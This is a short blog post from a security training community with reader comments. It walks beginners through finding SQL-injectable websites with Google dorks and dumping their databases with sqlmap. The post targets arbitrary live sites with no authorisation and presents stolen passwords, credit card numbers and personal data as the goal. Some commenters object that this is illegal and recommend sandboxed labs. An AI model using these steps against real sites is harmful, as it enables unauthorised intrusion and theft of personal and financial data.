Hacking Database

February 21, 2018 | Views: 3729

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hi dear hackers,

Hacking database is a pretty cool thing you wanna do.Why databases? Certainly its about the information it holds such as passwords, credit card numbers even your girlfriend’s phone number. So here I’m going to explain how can we hack into databases using sqlmap which is based oSQLql injection. So you ready?

Ok let’s begin.

Before you want to break into a database of a site,we have to find a website ensure whether it is vulnerable or not. You can use google dorks for this.

A. for example:inurl:index.php?id=1 just go through a few sites and put ‘ at the end of theselected url.

www.targetsite.com/index.php?id=1′

If it returns an error, then it is possibly vulnerable to sql injection, say like:

Warning: include(include/.php) [function.include]: failed to open stream: No such file or directory in /index.php on line 38

B.fireup sqlmap and enter the following commands:

1.sqlmap -u targetsite.come/index.php?id=1 –dbs(It retrieves all database in the server)

2.sqlmap -u targetsite.come/index.php?id=1 -D dbname –tables(it retrieves all tables in dbname)

3.sqlmap -u targetsite.come/index.php?id=1 -D dbname -T tablename –columns(retrieves columns of    tablename such as id,username,password)

4.sqlmap -u targetsite.come/index.php?id=1 -D dbname -T tablename -C columnname –dump

                                Then you will get table along with specified column names. Bingo!

Happy hunting. Thank you.

 

 

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
6 Comments
  1. Thanks! Make sure to include all the consequences of doing this for your future post. Happy hacking!

  2. It not hacking, it scriptie kiddie’s type of using tool without understanding how it works (just give a command to black box and get the result). But to be real hacker you have to understand what is sql injection, how this sqlmap tool gets all the databases, column names, etc.

    • I know bro,it just for beginners and just about automated hacking…did i told you teaching about sql injection?how can somebody hack a database using SqlMap.. that’s all I considered.I just wanted to help guys who wants to know about SqlMap and how to use it.No one said a great hacker should be use SqlMap or Know about it.

      • From the opposite side of the coin, you are ‘teaching’ people to run scans for vulnerable websites without any understanding of what it means or what the dangers are. Doing this on a website without their say so is technically illegal. Someone could end up doing damage to a site and end up in hot water if they use this as a starting point and then carry on in order to try to learn.

        Pointing a tool at the open internet is NOT the way to learn. You should be advocating that people set up a sandboxed environment for this and use ready made vulnerable webapps and websites (things like metasploitable) and either learn by doing, by checking out free resources or a mixture of both.

        I’m not having a go at you for giving a quick view of sqlmap, but you shouldn’t be saying look at google and target a site you find there.

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel